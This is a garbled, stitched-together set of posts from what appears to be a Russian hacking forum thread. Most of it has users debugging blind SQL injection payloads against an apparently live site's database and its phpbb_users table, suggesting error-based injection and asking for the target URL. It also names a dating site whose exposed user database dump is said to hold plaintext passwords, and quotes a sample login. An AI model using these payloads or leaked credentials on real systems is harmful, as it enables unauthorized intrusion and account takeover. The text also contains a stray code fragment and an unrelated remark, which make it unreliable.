ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!

делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

но когда пытаюсь выбрать из базы:

(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

вылазит ошибка

Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

в чем проблема?

InferNo23

подзапрос select надо взять в скобки

SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))

(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))

теперь

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1

" if author else f"
Вродь дернули на 1337db.com, но сайт тоже не отвечает.

Следите за ихним твиттером, возможно, объявятся еще.

InferNo23

так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?

зачем посимвольно..

http://www.tringuladating.com//db/

Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.

странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки

А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?